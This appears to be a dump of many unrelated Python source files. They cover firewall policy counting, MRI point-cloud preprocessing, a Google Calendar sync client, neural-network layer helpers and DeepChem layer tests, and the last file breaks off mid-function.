service_element_num = 1
src_address_element_num = 1
dst_address_element_num = 1
pre_services = {'"PING"': {"icmp": ''},
'"ICMP-ANY"': {"icmp": ''},
'"FTP"': {"tcp": '21'},
'"SSH"': {"tcp": '22'},
'"TELNET"': {"tcp": '23'},
'"SMTP"': {"tcp": '25'},
'"MAIL"': {"tcp": '25'},
'"DNS"': {"tcp": '53', "udp": '53'},
'"TFTP"': {"tcp": '69'},
'"HTTP"': {"tcp": '80'},
'"POP3"': {"tcp": '110'},
'"NTP"': {"tcp": '123', "udp": '123'},
'"MS-RPC-EPM"': {"tcp": '135', "udp": '135'},
'"NBNAME"': {"udp": '137'},
'"NBDS"': {"udp": '138'},
'"SMB"': {"tcp": ['139', '445']},
'"IMAP"': {"tcp": '143'},
'"SNMP"': {"tcp": ['161', '162'], "udp": ['161', '162']},
'"LDAP"': {"tcp": '389'},
'"HTTPS"': {"tcp": '443'},
'"IKE"': {"udp": '500'},
'"SYSLOG"': {"udp": '514'},
'"TALK"': {"udp": ['517', '518']},
'"MS-SQL"': {"tcp": '1433'},
'"WINFRAME"': {"tcp": '1494'},
'"L2TP"': {"udp": '1701'},
'"H.323"': {"tcp": '1720'},
'"PPTP"': {"tcp": '1723'},
'"RADIUS"': {"udp": ['1812', '1813']},
'"SIP"': {"tcp": '5060', "udp": '5060'},
'"X-WINDOWS"': {"tcp": '6000'},
'"HTTP-EXT"': {"tcp": '8000'},
'"TRACEROUTE"': {"icmp": '', "udp": '33400'},
'"TCP-ANY"': {"tcp": '65535'},
'"UDP-ANY"': {"udp": '65535'}}
def confirm_service_name(service_name):
global service_list
service_list = []
if len(absorbdict.group_service_dict) >= 2:
flags = False
for group_service_c in absorbdict.group_service_dict:
if service_name == group_service_c['group_service_name']:
flags = True
service_element_name = group_service_c['service_name']
flag = False
for group_service2_c in absorbdict.group_service_dict:
if service_element_name == group_service2_c['group_service_name']:
flag = True
service_list += [group_service2_c['service_name']]
continue
else:
if not flag:
service_list += [service_element_name]
continue
else:
if not flags:
service_list += [service_name]
else:
service_list += [service_name]
return service_list
def count_setting_service_element_num(service_list_c):
global service_element_num
for service_c in absorbdict.service_dict:
if service_list_c == service_c['service_name']:
service_element_num += 1
continue
return service_element_num
def count_service_element_num(service_name):
global service_element_num
service_element_num = 0
confirm_service_name(service_name)
for service_list_c in service_list:
flag = False
for pre_service_name, port_num in pre_services.items():
if service_list_c == pre_service_name:
#print(pre_service_name, service_element_num)
flag = True
count_pre_service_element(pre_service_name)
service_element_num += pre_service_element_num
else:
if not flag:
#print(service_list_c)
handle_setting_service_name(service_list_c)
return service_element_num
def confirm_service_element(service_name):
# service_nameレベルにしたservice_listを返す
count_service_element_num(service_name)
# service_list内の各要素を処理しservice_element_numを返す
return service_element_num
def handle_setting_service_name(service_list_c):
global service_element_num
flag = False
for service_c in absorbdict.service_dict:
if service_list_c == service_c['service_name']:
flag = True
service_element_num += 1
else:
if not flag:
service_element_num += 1
return service_element_num
def confirm_pre_service_used_protocol(pre_service_name):
global pre_service_used_protocol
for pre_service, port_num_dict in pre_services.items():
if pre_service_name == pre_service:
pre_service_used_protocol = port_num_dict
return pre_service_used_protocol
def count_pre_service_element(pre_service_name):
global pre_service_element_num
confirm_pre_service_used_protocol(pre_service_name)
pre_service_element_num = 0
for k, v in pre_service_used_protocol.items():
if type(v) == list:
pre_service_element_num += len(v)
else:
pre_service_element_num += 1
return pre_service_element_num
def count_group_address_element(group_name):
global address_element_num
address_element_num = 0
for group_address_c in absorbdict.group_address_dict:
if group_name == group_address_c['group_name']:
address_element_name = group_address_c['address_name']
flag = False
c = 0
for group_address2_c in absorbdict.group_address_dict:
if address_element_name == group_address2_c['group_name']:
flag = True
c += 1
else:
if flag:
address_element_num += c
else:
flag = False
for address_c in absorbdict.address_dict:
if address_element_name == address_c['address_name']:
d = address_c
address_element_num += 1
flag = True
else:
if not flag:
d = group_address_c
address_element_num += list(
d.values()).count(group_name)
else:
return address_element_num
def judge_src_address_name(address_name):
global src_address_element_num
for group_address_c in absorbdict.group_address_dict:
if group_address_c['group_name'] == address_name:
group_name = group_address_c['group_name']
count_group_address_element(group_name)
src_address_element_num = address_element_num
break
else:
src_address_element_num = 1
continue
else:
return src_address_element_num
def judge_dst_address_name(address_name):
global dst_address_element_num
for group_address_c in absorbdict.group_address_dict:
if group_address_c['group_name'] == address_name:
group_name = group_address_c['group_name']
count_group_address_element(group_name)
dst_address_element_num = address_element_num
break
else:
dst_address_element_num = 1
continue
else:
return dst_address_element_num
def append_data_to_list(append_list, data, src_element_num, dst_element_num, service_element_num):
append_list += [data] * src_element_num * \
dst_element_num * service_element_num
# 各要素の要素数を判定する関数にデータを渡して戻ってきた値に応じてリストにデータを追加していく
def handle_multiple_ip(policy, append_list, data):
global service_element_num
src_address = policy['src_ip']
dst_address = policy['dst_ip']
confirm_src_address_element(policy, src_address)
confirm_dst_address_element(policy, dst_address)
service_name = policy['protocol']
confirm_service_element(service_name)
append_data_to_list(append_list, data, src_element_num,
dst_element_num, service_element_num)
def confirm_src_vip_element(policy):
global src_element_num
src_element_num = 0
for vip_c in absorbdict.vip_dict:
if policy['src_ip'].strip(')"').split('(')[1] == vip_c['if_name']:
if vip_c['global_ip'] == "interface-ip" and policy['protocol'] == '"ANY"':
src_element_num += 1
continue
elif vip_c['global_ip'] == "interface-ip" and vip_c['service_name'] == policy['protocol']:
src_element_num += 1
elif policy['src_ip'].strip(')"').split('(')[1] == vip_c['global_ip']:
if policy['protocol'] == '"ANY"':
src_element_num += 1
continue
elif vip_c['service_name'] == policy['protocol']:
src_element_num += 1
else:
return src_element_num
def confirm_src_address_element(policy, src_address):
global src_element_num
if policy['src_ip'] == '"Any"' and 'Untrust"' not in policy['src_zone']:
src_element_num = 2
elif "VIP(" in policy['src_ip'] and policy['protocol'] == '"ANY"':
confirm_src_vip_element(policy)
else:
if absorbdict.group_address_dict != []:
address_name = src_address
judge_src_address_name(address_name)
src_element_num = src_address_element_num
else:
src_element_num = 1
return src_element_num
def confirm_dst_vip_element(policy):
global dst_element_num
dst_element_num = 0
for vip_c in absorbdict.vip_dict:
if policy['dst_ip'].strip(')"').split('(')[1] == vip_c['if_name']:
if vip_c['global_ip'] == "interface-ip" and policy['protocol'] == '"ANY"':
dst_element_num += 1
continue
elif vip_c['global_ip'] == "interface-ip" and vip_c['service_name'] == policy['protocol']:
dst_element_num += 1
elif policy['dst_ip'].strip(')"').split('(')[1] == vip_c['global_ip']:
if policy['protocol'] == '"ANY"':
dst_element_num += 1
continue
elif vip_c['service_name'] == policy['protocol']:
dst_element_num += 1
else:
return dst_element_num
def confirm_dst_address_element(policy, dst_address):
global dst_element_num
# TODO:IPが割り当てられていないゾーンを用いると重複して出力されているためelement_numを修正する
if policy['dst_ip'] == '"Any"' and 'Untrust"' not in policy['dst_zone']:
dst_element_num = 2
elif "VIP(" in policy['dst_ip'] and policy['protocol'] == '"ANY"':
confirm_dst_vip_element(policy)
else:
if absorbdict.group_address_dict != []:
address_name = dst_address
judge_dst_address_name(address_name)
dst_element_num = dst_address_element_num
else:
dst_element_num = 1
return dst_element_num
|
1620330
|
from sklearn.neighbors import KDTree
from os.path import join, exists, dirname, abspath
import numpy as np
import pandas as pd
import os, sys, glob, pickle
import nibabel as nib
from multiprocessing import Process
import concurrent.futures
from tqdm import tqdm
from scipy import ndimage
import argparse
BASE_DIR = dirname(abspath(__file__))
ROOT_DIR = dirname(BASE_DIR)
sys.path.append(BASE_DIR)
sys.path.append(ROOT_DIR)
from helper_ply import write_ply
from helper_tool import DataProcessing as DP
import time
typeimg = ['t1ce','t1', 'flair', 't2', 'seg']
sub_grid_size = 0.01
out_format = '.ply'
parallel = False
dataTraining = True
n_point = 365000
def load_volume(ID):
def itensity_normalize_one_volume(volume):
"""
normalize the itensity of an nd volume based on the mean and std of nonzeor region
inputs:
volume: the input nd volume
outputs:
out: the normalized nd volume
"""
pixels = volume[volume > 0]
mean = pixels.mean()
std = pixels.std()
out = (volume - mean)/std
# random normal too slow
#out_random = np.random.normal(0, 1, size = volume.shape)
out_random = np.zeros(volume.shape)
out[volume == 0] = out_random[volume == 0]
return out
path_volume = os.path.join(dataset_path, ID, ID)
output_volume = np.empty((5,240,240,155))
#Load and process image
for i,mod in enumerate(typeimg[:-1]):
path_mod = str(path_volume+'_'+mod+'.nii.gz')
img = np.asanyarray(nib.load(path_mod).dataobj)
img = itensity_normalize_one_volume(img)
output_volume[i] = img
if dataTraining:
path_mod = str(path_volume+'_'+typeimg[-1]+'.nii.gz')
img = np.asanyarray(nib.load(path_mod).dataobj)
img[img==4]=3
output_volume[4] = img
else:
path_mask = os.path.join(attention_mask_path, ID+'.nii.gz')
mask = np.asanyarray(nib.load(path_mask).dataobj)
mask = mask.astype(np.uint8)
output_volume[4] = mask
return output_volume
def convert_pc2ply(volume,ID):
channel,x_axis, y_axis, z_axis = volume.shape
data_list = [[x,y,z,volume[0][x][y][z],volume[1][x][y][z],volume[2][x][y][z],volume[3][x][y][z],volume[4][x][y][z]] for x in range(x_axis) for y in range(y_axis) for z in range(z_axis) if (volume[0][x][y][z] != 0 or volume[1][x][y][z] != 0 or volume[2][x][y][z] != 0 or volume[3][x][y][z] != 0)]
pc_data = np.array(data_list)
xyz_origin = pc_data[:,:3].astype(int)
np.save(os.path.join(sub_pc_folder, ID+"_xyz_origin.npy"), xyz_origin)
xyz_min = np.array([x_axis,y_axis,z_axis])
pc_data[:, 0:3] /= xyz_min
xyz = pc_data[:, :3].astype(np.float32)
colors = pc_data[:, 3:7].astype(np.float32)
labels = pc_data[:,7].astype(np.uint8)
(unique, counts) = np.unique(labels, return_counts=True)
print(ID," n point ", len(labels),unique, counts )
#write full ply
write_ply(os.path.join(original_pc_folder, ID+out_format), (xyz, colors, labels), ['x', 'y', 'z', 't1ce', 't1', 'flair', 't2' ,'class'])
# save sub_cloud and KDTree file
sub_xyz, sub_colors, sub_labels = DP.grid_sub_sampling(xyz, colors, labels, sub_grid_size)
#write sub ply
write_ply(os.path.join(sub_pc_folder, ID+out_format), [sub_xyz, sub_colors, sub_labels], ['x', 'y', 'z', 't1ce', 't1', 'flair', 't2' ,'class'])
kd_tree_file = os.path.join(sub_pc_folder, ID+ '_KDTree.pkl')
search_tree = KDTree(sub_xyz)
with open(kd_tree_file, 'wb') as f:
pickle.dump(search_tree, f)
proj_idx = np.squeeze(search_tree.query(xyz, return_distance=False))
proj_idx = proj_idx.astype(np.int32)
proj_save = os.path.join(sub_pc_folder, ID+ '_proj.pkl')
with open(proj_save, 'wb') as f:
pickle.dump([proj_idx, labels], f)
def process_data_and_save(ID):
convert_pc2ply(load_volume(ID),ID)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--n_point', type=int, default=365000, help='The number of points cloud ')
parser.add_argument('--data_3D_path', type=str, default=0, help='Path to the 3D volume data')
parser.add_argument('--outPC_path', type=str, default='train', help='Path of output points cloud data')
FLAGS = parser.parse_args()
dataset_path = FLAGS.data_3D_path
outPC_path = FLAGS.outPC_path
n_point = FLAGS.n_point
original_pc_folder = os.path.join(outPC_path,"original_ply")
sub_pc_folder = os.path.join(outPC_path,"input0.01")
attention_mask_path = None # you can modify to path binary of the attention network during the inference process
if not exists(original_pc_folder):
os.makedirs(original_pc_folder)
if not exists(sub_pc_folder):
os.makedirs(sub_pc_folder)
list_ID = os.listdir(dataset_path)
if parallel:
with concurrent.futures.ProcessPoolExecutor(50) as executor:
tqdm(executor.map(process_data_and_save, list_ID), total=len(list_ID))
else:
for i,ID in enumerate(list_ID):
process_data_and_save(ID)
|
1620354
|
from hathor.conf import HathorSettings
from hathor.simulator import FakeConnection
from tests import unittest
settings = HathorSettings()
class SyncV1HathorCapabilitiesTestCase(unittest.SyncV1Params, unittest.TestCase):
def test_capabilities(self):
network = 'testnet'
manager1 = self.create_peer(network, capabilities=[settings.CAPABILITY_WHITELIST])
manager2 = self.create_peer(network, capabilities=[])
conn = FakeConnection(manager1, manager2)
# Run the p2p protocol.
for _ in range(100):
conn.run_one_step(debug=True)
self.clock.advance(0.1)
# Even if we don't have the capability we must connect because the whitelist url conf is None
self.assertEqual(conn._proto1.state.state_name, 'READY')
self.assertEqual(conn._proto2.state.state_name, 'READY')
manager3 = self.create_peer(network, capabilities=[settings.CAPABILITY_WHITELIST])
manager4 = self.create_peer(network, capabilities=[settings.CAPABILITY_WHITELIST])
conn2 = FakeConnection(manager3, manager4)
# Run the p2p protocol.
for _ in range(100):
conn2.run_one_step(debug=True)
self.clock.advance(0.1)
self.assertEqual(conn2._proto1.state.state_name, 'READY')
self.assertEqual(conn2._proto2.state.state_name, 'READY')
class SyncV2HathorCapabilitiesTestCase(unittest.SyncV2Params, unittest.TestCase):
__test__ = True
# sync-bridge should behave like sync-v2
class SyncBridgeHathorCapabilitiesTestCase(unittest.SyncBridgeParams, SyncV2HathorCapabilitiesTestCase):
pass
|
1620361
|
from typing import List
from .asset import Asset
from .jinja_renderer import JinjaRenderer
from .logging import getLogger
from .paths import Paths
from .process import fail
from .factset import Factset
logger = getLogger(__name__)
paths = Paths()
class Assetset():
"""A collection of Assets (external files) for use in a build."""
def __init__(self, assets: List[Asset]) -> None:
self.assets = assets
logger.debug(f'New Assetset: {self}')
@classmethod
def from_config(cls, config: List[dict]=[], facts: Factset=Factset()):
"""Create an Assetset using a configuration block in tedi.yml
The YAML form looks like this:
- filename: bigball.tar.gz
source: http://example.org/downloads/bigball-v1.tar.gz
- filename: mince_pie
source: file:///usr/local/pies/{{ pie_type_fact }}
This method accepts the above data structure as a Python list. It also
arranges for template tokens in the configuration to be expanded, using
the facts available in the Factset.
"""
assets = []
renderer = JinjaRenderer(facts)
for asset in config:
if 'filename' not in asset or 'source' not in asset:
logger.critical('Each asset must declare "filename" and "source".')
fail()
# Expand any facts in the asset declaration.
filename = renderer.render_string(asset['filename'])
source = renderer.render_string(asset['source'])
assets.append(Asset(filename, source))
return cls(assets)
def __repr__(self) -> str:
return f'Assetset({self.assets})'
def acquire(self) -> None:
"""Acquire (download) all the assets in this Assetset."""
for asset in self.assets:
asset.acquire(paths.assets_path)
|
1620371
|
from .TftEndpoint import TftEndpoint
class SummonerEndpoint(TftEndpoint):
def __init__(self, url: str, **kwargs):
nurl = "/summoner/v1/summoners" + url
super().__init__(nurl, **kwargs)
class SummonerApiUrls:
by_account = SummonerEndpoint("/by-account/{encrypted_account_id}")
by_name = SummonerEndpoint("/by-name/{summoner_name}")
by_puuid = SummonerEndpoint("/by-puuid/{puuid}")
by_id = SummonerEndpoint("/{encrypted_summoner_id}")
|
1620392
|
from sqlalchemy import Column, String, Boolean, Integer, ForeignKey, Text
from sqlalchemy.orm import relationship
from app.models.base import Base
class PredictBuildings(Base):
gid = Column(Integer, primary_key=True, autoincrement=True)
geom = Column(Text)
task_id = Column(Integer, primary_key=True)
extent = Column(String(256))
user_id = Column(String(50))
area_code = Column(String(50))
state = Column(Integer, default=1)
status = Column(Integer, default=1)
|
1620408
|
import cv2 as cv
import numpy as np
img = cv.imread(r'C:\Users\PIYUS\Desktop\Image Processing\learning\Resources\Photos\park.jpg')
cv.imshow("Img", img)
blank = np.zeros(img.shape[:2], dtype='uint8')
b , g , r = cv.split(img)
# even after splitting how to get the actual color in place?
blue = cv.merge([b, blank, blank])
green = cv.merge([blank, g, blank])
red = cv.merge([blank, blank, r])
cv.imshow("Blue", blue) # for blue, there is high concentration of blue in sky but very low of it in trees
cv.imshow("Green", green)
cv.imshow("Red", red)
# print(img.shape)# (427, 640, 3) The 3 is for 3 color channels
# print(b.shape)
# print(g.shape)
# print(r.shape)
# (427, 640)
# (427, 640)
# (427, 640)
merged = cv.merge([b,g,r])
cv.imshow("merged", merged)
cv.waitKey(0)
|
1620434
|
from __future__ import unicode_literals
from django.utils.safestring import mark_safe
def setting_widget(instance):
return mark_safe(
'''
<strong>{}</strong>
<p class="small">{}</p>
'''.format(instance, instance.help_text or '')
)
|
1620456
|
import time
import pickle
from pathlib import Path
from googleapiclient.discovery import build
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request
from googleapiclient.errors import HttpError
from aircal.export import INSERT_ACTION, UPDATE_ACTION, DELETE_ACTION
SCOPES = ['https://www.googleapis.com/auth/calendar']
TITLE_PREFIX = 'DAG:'
class GCalClient(object):
def __init__(self, calendar_id, creds_dir, logger, max_results=2000):
creds = self._auth(creds_dir)
self.calendar_id = calendar_id
self.service = build('calendar', 'v3', credentials=creds)
self.max_results = max_results
self.logger = logger
def _auth(self, creds_dir):
creds = None
token_path = creds_dir / 'token.pickle'
creds_path = creds_dir / 'credentials.json'
# The file token.pickle stores the user's access and refresh tokens, and is
# created automatically when the authorization flow completes for the first
# time.
if token_path.exists():
with open(token_path, 'rb') as token:
creds = pickle.load(token)
# If there are no (valid) credentials available, let the user log in.
if not creds or not creds.valid:
if creds and creds.expired and creds.refresh_token:
creds.refresh(Request())
else:
flow = InstalledAppFlow.from_client_secrets_file(creds_path, SCOPES)
creds = flow.run_local_server(port=0)
with open(token_path, 'wb') as token:
pickle.dump(creds, token)
return creds
def create_event(self, dag_id, start_date, end_date):
event = {
'summary': 'DAG: %s' % dag_id,
'start': {
'dateTime': start_date.strftime('%Y-%m-%dT%H:%M:0'),
'timeZone': 'Etc/UTC',
},
'end': {
'dateTime': end_date.strftime('%Y-%m-%dT%H:%M:0'),
'timeZone': 'Etc/UTC',
}
}
event = self.service.events().insert(calendarId=self.calendar_id, body=event).execute()
return event['status']
def delete_event(self, event_id):
self.service.events().delete(calendarId=self.calendar_id, eventId=event_id).execute()
return 'deleted'
def update_event(self, event_id, dag_id, start_date, end_date):
event = {
'summary': 'DAG: %s' % dag_id,
'start': {
'dateTime': start_date.strftime('%Y-%m-%dT%H:%M:0'),
'timeZone': 'Etc/UTC',
},
'end': {
'dateTime': end_date.strftime('%Y-%m-%dT%H:%M:0'),
'timeZone': 'Etc/UTC',
}
}
event = self.service.events().update(calendarId=self.calendar_id, eventId=event_id, body=event).execute()
return event['status']
def do_sync(self, v):
for i in range(3):
try:
if v.action == INSERT_ACTION:
self.create_event(v.dag_id, v.start_date, v.end_date)
elif v.action == DELETE_ACTION:
self.delete_event(v.event_id)
elif v.action == UPDATE_ACTION:
self.update_event(v.event_id, v.dag_id, v.start_date, v.end_date)
else:
raise Exception('action not supported')
except HttpError as ex:
print(ex)
self.logger.error('HTTP exception occured, retrying')
time.sleep(10**(i+1))
else:
return 0
return 1
def get_events(self, base_date):
events_result = self.service.events().list(
calendarId=self.calendar_id, maxResults=self.max_results,
timeMin=base_date, singleEvents=True, orderBy='startTime'
).execute()
events = events_result.get('items', [])
if len(events) == self.max_results:
raise Exception((
'# of retrieved events equals to max results. Some events might be ignored. '
'Consider increasing max_results parameter or decrease n_horizon_days.'))
elig_events = [v for v in events if v.get('summary', '').startswith(TITLE_PREFIX)]
for event in elig_events:
event['summary'] = event['summary'].replace(TITLE_PREFIX, '').strip()
return elig_events
|
1620473
|
import argparse
def get_parser():
"""Returns an arguments parser"""
parser = argparse.ArgumentParser(description="Background Matting on Videos.")
parser.add_argument(
"-n", "--name", type=str, required=True, help="Name of processing."
)
parser.add_argument(
"-i", "--input", type=str, required=True, help="Path to videos folder."
)
parser.add_argument(
"-o",
"--output_dir",
type=str,
required=True,
help="Directory to save the output results.",
)
parser.add_argument(
"-s",
"--start",
type=str,
default="00",
help="Start point to process (in seconds). Default 0.",
)
parser.add_argument(
"-d",
"--duration",
type=str,
default="-1",
help="Duration of the processed video (in seconds). Set to '-1' to process till"
" the end of the video. Default '-1'.",
)
parser.add_argument(
"-pt",
"--proportional_threshold",
type=str,
default=None,
help="Comma separated list to set which videos must be split in two according"
" to a proportional threshold before processing. For example, for two videos "
"where we want to split the first one (alphabetical order) at the person half,"
' set this parameter to "0.5" or "0.5,',
)
parser.add_argument(
"-ft",
"--fixed_threshold",
type=str,
default=None,
help="Colon separated list to set which videos must be split in two by a fixed"
" threshold before processing. For example, for two videos where we want to "
"split the first one (alphabetical order) by the line 640, set this parameter "
'to "640" or "640:".',
)
parser.add_argument(
"-shp",
"--sharpen",
type=bool,
default=False,
help="Enable sharpen original color image to help on noise removal. Default to "
"False.",
)
parser.add_argument(
"-mask_ops",
"--mask_ops",
type=str,
default="",
help="Morphological operations to apply to masks for each video. Format "
"[erode|dilate],KernelSize,Iterations;...;blur,KernelSize,SigmaX:[...]. Default"
' "erode,3,10;dilate,5,5;blur,31,0" for each video. Specify "-" to not use any '
"morphological operation on the mask.",
)
parser.add_argument(
"-o_types",
"--output_types",
type=str,
default="out,matte",
help="Output types generation separated by comma. Valid values are out,matte,"
'compose,fg. Default "out,matte".',
)
parser.add_argument(
"-bg",
"--background",
type=str,
help="Path to background video directory for compose output.",
)
parser.add_argument(
"--kinect_mask",
dest="kinect_mask",
action="store_true",
help="Enable the use of azure kinect mask (Default).",
)
parser.add_argument(
"--no_kinect_mask",
dest="kinect_mask",
action="store_false",
help="Disble the use of azure kinect mask.",
)
parser.set_defaults(kinect_mask=True)
parser.add_argument(
"-i_ext",
"--input_extension",
type=str,
default="mp4",
help="Input videos extension. Only if not using Azure Kinect videos.",
)
return parser
|
1620492
|
from database.conn import db
from database.models import RawFacebookComments, RawTwitterComments, RawInstagramComments, RawYouTubeComments, RawHashtagComments
from peewee import *
from playhouse.migrate import *
if __name__ == "__main__":
db.connect()
db.create_tables([
RawFacebookComments,
RawTwitterComments,
RawInstagramComments,
RawYouTubeComments,
RawHashtagComments,
])
# Exemplo, caso da necessidade de atualizar alguma tabela
# with db.atomic():
# migrator = SqliteMigrator(db)
# migrate(
# migrator.add_column('raw_facebook_comments', 'clean_comment', TextField(default='')),
# migrator.add_column('raw_twitter_comments', 'clean_comment', TextField(default='')),
# migrator.add_column('raw_instagram_comments', 'clean_comment', TextField(default='')),
# migrator.add_column('raw_youtube_comments', 'clean_comment', TextField(default='')),
# migrator.add_column('raw_hashtag_comments', 'clean_comment', TextField(default='')),
# )
|
1620547
|
from cs231n.layers import *
from cs231n.fast_layers import *
def affine_relu_forward(x, w, b):
"""
Convenience layer that perorms an affine transform followed by a ReLU
Inputs:
- x: Input to the affine layer
- w, b: Weights for the affine layer
Returns a tuple of:
- out: Output from the ReLU
- cache: Object to give to the backward pass
"""
a, fc_cache = affine_forward(x, w, b)
out, relu_cache = relu_forward(a)
cache = (fc_cache, relu_cache)
return out, cache
def affine_relu_backward(dout, cache):
"""
Backward pass for the affine-relu convenience layer
"""
fc_cache, relu_cache = cache
da = relu_backward(dout, relu_cache)
dx, dw, db = affine_backward(da, fc_cache)
return dx, dw, db
def affine_batch_norm_relu_forward(x,w,b,gamma,beta,bn_params):
"""
Our layer that performs batch normalization after affine and then relu
Inputs:
- x: Input to the affine layer
- w, b: Weights for the affine layer
- gamma, beta : Weight for the batch norm regularization
- bn_params : Contain variable use to batch norml, running_mean and var
Returns a tuple of:
- out: Output from the ReLU
- cache: Object to give to the backward pass
"""
a,fc_cache = affine_forward(x,w,b)
b,batch_norm_cache = batchnorm_forward(a, gamma, beta, bn_params)
out,relu_cache = relu_forward(b)
cache = (fc_cache,batch_norm_cache,relu_cache)
return out,cache
def affine_batch_norm_relu_backward(dout,cache):
"""
Backward pass for our affine-norm-relu convenience layer
"""
fc_cache,batch_norm_cache,relu_cache = cache
da = relu_backward(dout,relu_cache)
db_norm,dgamma,dbeta = batchnorm_backward(da,batch_norm_cache)
dx,dw,db = affine_backward(db_norm,fc_cache)
return dx,dw,db,dgamma,dbeta
pass
def conv_relu_forward(x, w, b, conv_param):
"""
A convenience layer that performs a convolution followed by a ReLU.
Inputs:
- x: Input to the convolutional layer
- w, b, conv_param: Weights and parameters for the convolutional layer
Returns a tuple of:
- out: Output from the ReLU
- cache: Object to give to the backward pass
"""
a, conv_cache = conv_forward_fast(x, w, b, conv_param)
out, relu_cache = relu_forward(a)
cache = (conv_cache, relu_cache)
return out, cache
def conv_relu_backward(dout, cache):
"""
Backward pass for the conv-relu convenience layer.
"""
conv_cache, relu_cache = cache
da = relu_backward(dout, relu_cache)
dx, dw, db = conv_backward_fast(da, conv_cache)
return dx, dw, db
def conv_relu_pool_forward(x, w, b, conv_param, pool_param):
"""
Convenience layer that performs a convolution, a ReLU, and a pool.
Inputs:
- x: Input to the convolutional layer
- w, b, conv_param: Weights and parameters for the convolutional layer
- pool_param: Parameters for the pooling layer
Returns a tuple of:
- out: Output from the pooling layer
- cache: Object to give to the backward pass
"""
a, conv_cache = conv_forward_fast(x, w, b, conv_param)
s, relu_cache = relu_forward(a)
out, pool_cache = max_pool_forward_fast(s, pool_param)
cache = (conv_cache, relu_cache, pool_cache)
return out, cache
def conv_relu_pool_backward(dout, cache):
"""
Backward pass for the conv-relu-pool convenience layer
"""
conv_cache, relu_cache, pool_cache = cache
ds = max_pool_backward_fast(dout, pool_cache)
da = relu_backward(ds, relu_cache)
dx, dw, db = conv_backward_fast(da, conv_cache)
return dx, dw, db
|
1620549
|
from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^apply/$', views.coupon_apply, name='apply'),
]
|
1620578
|
import numpy as np
import tensorflow as tf
from deepchem.models import TensorGraph
from deepchem.models.tensorgraph.layers import Feature, Conv1D, Dense, Flatten, Reshape, Squeeze, Transpose, \
CombineMeanStd, Repeat, GRU, L2Loss, Concat, SoftMax, Constant, Variable, Add, Multiply, InteratomicL2Distances, \
SoftMaxCrossEntropy, ReduceMean, ToFloat, ReduceSquareDifference, Conv2D, MaxPool, ReduceSum, GraphConv, GraphPool, \
GraphGather, BatchNorm, WeightedError
from deepchem.models.tensorgraph.graph_layers import Combine_AP, Separate_AP, \
WeaveLayer, WeaveGather, DTNNEmbedding, DTNNGather, DTNNStep, \
DTNNExtract, DAGLayer, DAGGather, MessagePassing, SetGather
def test_Conv1D_pickle():
tg = TensorGraph()
feature = Feature(shape=(tg.batch_size, 1, 1))
conv = Conv1D(2, 1, in_layers=feature)
tg.add_output(conv)
tg.set_loss(conv)
tg.build()
tg.save()
def test_Dense_pickle():
tg = TensorGraph()
feature = Feature(shape=(tg.batch_size, 1))
dense = Dense(out_channels=1, in_layers=feature)
tg.add_output(dense)
tg.set_loss(dense)
tg.build()
tg.save()
def test_Flatten_pickle():
tg = TensorGraph()
feature = Feature(shape=(tg.batch_size, 1))
layer = Flatten(in_layers=feature)
tg.add_output(layer)
tg.set_loss(layer)
tg.build()
tg.save()
def test_Reshape_pickle():
tg = TensorGraph()
feature = Feature(shape=(tg.batch_size, 1))
layer = Reshape(shape=(-1, 2), in_layers=feature)
tg.add_output(layer)
tg.set_loss(layer)
tg.build()
tg.save()
def test_Squeeze_pickle():
tg = TensorGraph()
feature = Feature(shape=(tg.batch_size, 1))
layer = Squeeze(squeeze_dims=-1, in_layers=feature)
tg.add_output(layer)
tg.set_loss(layer)
tg.build()
tg.save()
def test_Transpose_pickle():
tg = TensorGraph()
feature = Feature(shape=(tg.batch_size, 1))
layer = Transpose(perm=(1, 0), in_layers=feature)
tg.add_output(layer)
tg.set_loss(layer)
tg.build()
tg.save()
def test_CombineMeanStd_pickle():
tg = TensorGraph()
feature = Feature(shape=(tg.batch_size, 1))
layer = CombineMeanStd(in_layers=[feature, feature])
tg.add_output(layer)
tg.set_loss(layer)
tg.build()
tg.save()
def test_Repeat_pickle():
tg = TensorGraph()
feature = Feature(shape=(tg.batch_size, 1))
layer = Repeat(n_times=10, in_layers=feature)
tg.add_output(layer)
tg.set_loss(layer)
tg.build()
tg.save()
def test_GRU_pickle():
tg = TensorGraph()
feature = Feature(shape=(tg.batch_size, 10, 10))
layer = GRU(n_hidden=10, batch_size=tg.batch_size, in_layers=feature)
tg.add_output(layer)
tg.set_loss(layer)
tg.build()
tg.save()
def test_L2loss_pickle():
tg = TensorGraph()
feature = Feature(shape=(tg.batch_size, 1))
layer = L2Loss(in_layers=[feature, feature])
tg.add_output(layer)
tg.set_loss(layer)
tg.build()
tg.save()
def test_Softmax_pickle():
tg = TensorGraph()
feature = Feature(shape=(tg.batch_size, 1))
layer = SoftMax(in_layers=feature)
tg.add_output(layer)
tg.set_loss(layer)
tg.build()
tg.save()
def test_Concat_pickle():
tg = TensorGraph()
feature = Feature(shape=(tg.batch_size, 1))
layer = Concat(in_layers=[feature, feature])
tg.add_output(layer)
tg.set_loss(layer)
tg.build()
tg.save()
def test_Constant_pickle():
tg = TensorGraph()
feature = Feature(shape=(tg.batch_size, 1))
layer = Constant(np.expand_dims([17] * tg.batch_size, -1))
output = Add(in_layers=[feature, layer])
tg.add_output(output)
tg.set_loss(output)
tg.build()
tg.save()
def test_Variable_pickle():
tg = TensorGraph()
feature = Feature(shape=(tg.batch_size, 1))
layer = Variable(np.expand_dims([17] * tg.batch_size, -1))
output = Multiply(in_layers=[feature, layer])
tg.add_output(output)
tg.set_loss(output)
tg.build()
tg.save()
def testInteratomicL2Distances():
"""
TODO(LESWING) what is ndim here?
:return:
"""
tg = TensorGraph()
n_atoms = tg.batch_size
M_nbrs = 4
n_dim = 3
feature = Feature(shape=(tg.batch_size, 3))
neighbors = Feature(shape=(tg.batch_size, M_nbrs), dtype=tf.int32)
layer = InteratomicL2Distances(
N_atoms=n_atoms,
M_nbrs=M_nbrs,
ndim=n_dim,
in_layers=[feature, neighbors])
tg.add_output(layer)
tg.set_loss(layer)
tg.build()
tg.save()
def test_SoftmaxCrossEntropy_pickle():
tg = TensorGraph()
feature = Feature(shape=(tg.batch_size, 1))
layer = SoftMaxCrossEntropy(in_layers=[feature, feature])
tg.add_output(layer)
tg.set_loss(layer)
tg.build()
tg.save()
def test_ReduceMean_pickle():
tg = TensorGraph()
feature = Feature(shape=(tg.batch_size, 1))
layer = ReduceMean(in_layers=[feature])
tg.add_output(layer)
